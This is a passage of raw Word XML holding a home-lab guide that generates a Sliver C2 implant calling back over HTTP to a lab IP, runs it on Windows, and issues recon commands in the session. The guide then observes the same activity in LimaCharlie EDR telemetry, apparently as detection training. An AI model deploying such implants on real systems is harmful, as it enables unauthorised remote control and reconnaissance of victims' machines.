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BA8C" w14:textId="369BCEB0" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Part 2 - Preparing for Attack &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682049B" w14:textId="74056A7F" w:rsidR="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve">This section assumes all prior steps, including setting up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>, have been completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586F47BB" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E"/>
    <w:p w14:paraId="34F76C80" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generating a C2 Implant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130A3B33" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start the Sliver Client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DDF0F" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Generate the C2 implant</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> and save it to the Windows system’s Downloads directory, using the IP address of the Ubuntu subsystem as the C2 IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE77DD" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>generate --http 172.25.114.254 --save /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>/c/Users/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>sywtbsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>/Downloads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178FAB5" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verify the implant is stored</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> by running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6CAD7" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>implants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B306B8D" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ensure the HTTP listener is running</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> by executing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC778B0" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DFBCF" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>If not running, start it using the http command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60622869" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Keep the Sliver client window open for future steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B539C9" w14:textId="45AEC9EB" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E"/>
    <w:p w14:paraId="33768E3D" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Starting a Command and Control (C2) Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B992B" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Launch an Administrative Command Prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FECC0" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute the payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> by running the generated implant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DE2F28" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>C:\Users\sywtbsa\Downloads\[your_C2-implant.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4018C" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verify the session has checked in</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> on the Sliver server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C46E8" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confirm the active session</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> by running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53B57A" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965FC43" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interact with the C2 session</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> by replacing [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>] with the actual session ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D77B1C" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>use [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9AB731" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run basic commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> to gather system information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D729A5C" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA4966" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639ED66C" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>User identity and privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594EF8FD" w14:textId="7E0CF22A" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t>hoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45B2F3E0" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current working directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339667B8" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C15BB23" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network connections on the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4CCC3" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF045FB" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List running processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D75840F" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> -T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00581084" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Sliver highlights its own process in green and any detected security tools in red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E3BFE" w14:textId="51B33935" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E"/>
    <w:p w14:paraId="7ED06746" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Observing EDR Telemetry in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C16D527" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LimaCharlie’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> web UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> and navigate to “Sensors.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FC0239" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Select the active Windows sensor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE225F" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inspect system activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A94BF0" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Processes tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2FD39" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> the process tree and signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70492EAC" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Identify unsigned processes, including the C2 implant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42907AD0" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC460FE" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Filter results for the C2 IP or implant name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C9CB88" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File System tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139229C1" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Locate the implant’s executable in C:\Users\sywtbsa\Downloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695882A4" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve">Search its hash on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> for additional context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398A9E5" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeline tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA6147" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve">Track </w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>event logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> in near real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332A548" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:t>Filter for known indicators of compromise (IOCs), including implant creation and execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB6F62" w14:textId="3B342EC3" w:rsidR="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E"/>
    <w:p w14:paraId="0D683D1C" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E"/>
    <w:p w14:paraId="707B4FBC" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E"/>
    <w:p w14:paraId="00ECCD3C" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A26FB" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LimaCharlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> provides real-time telemetry</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> on system activity, including process execution, network connections, and file system modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0616CB" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unsigned or unknown processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> should be flagged for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A54426" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Familiarity with normal system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> helps in identifying malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF32EE" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D343232" w14:textId="77777777" w:rsidR="00544D6E" w:rsidRPr="00544D6E" w:rsidRDefault="00544D6E" w:rsidP="00544D6E">
